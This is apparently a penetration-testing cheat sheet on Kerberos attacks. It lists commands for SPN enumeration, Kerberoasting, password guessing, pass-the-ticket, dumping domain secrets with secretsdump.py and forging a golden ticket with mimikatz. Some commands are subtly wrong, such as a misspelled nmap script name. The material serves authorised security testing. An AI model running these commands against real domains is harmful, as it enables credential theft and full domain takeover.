Kerberos

Default Port: 88

Kerberos is a network authentication protocol that works on the basis of "tickets" to allow nodes to prove their identity over a non-secure network in a secure manner. Kerberos provides mutual authentication—both the user and the server verify each other's identity.

Recon

Identify Kerberos

To find all machines on a network that respond to Kerberos on TCP port 88:

nmap -p 88 --open --script=keberos -Pn -oA nmap/Kerberos 10.0.0.0/24

Enumeration

GetUserSPNs

We can use GetUserSPNs.py from Impacket to request Service Principal Names (SPNs) which might reveal valuable information and valid usernames.

python GetUserSPNs.py -request -dc-ip 10.0.0.1 DOMAIN/user

Attack Vectors

Password Guessing

Test for weak passwords associated with Kerberos-enabled users.

kerbrute password -d domain.com -t 10.0.0.1 UsersPasswords.txt

Pass the Ticket

Once a valid Kerberos ticket is obtained, PtT (Pass the Ticket) attacks can be performed using mimikatz.

mimikatz "kerberos::ptt ticket.kirbi"

Replace "ticket.kirbi" with your Kerberos ticket file.

mimikatz injects this ticket into memory, so any following command is authenticated against the Kerberos server using this ticket.

Kerberoasting

User accounts with SPNs can be Kerberoasted. This involves requesting a service ticket for the user, which can then be cracked offline.

python GetUserSPNs.py -request -dc-ip 10.0.0.1 DOMAIN/user

Post-Exploitation

Secrets Dumping

Once the system is compromised, a dump of all critical data including tickets, hashes, etc. can be performed to extend the attack.

Using secretsdump.py from Impacket:

python secretsdump.py -just-dc domain/Administrator:Password@10.0.0.1

Replace "domain/Administrator:Password" with the valid user and password.

Golden Ticket Attack

Creating a golden ticket allows virtually unrestricted access to the whole domain. For this, using mimikatz commands:

mimikatz "kerberos::golden /user:Administrator /domain:domain.com /sid:S-1-5-21-XXXX /krbtgt:eeb9046b77d48962314e376f1925065a /id:500"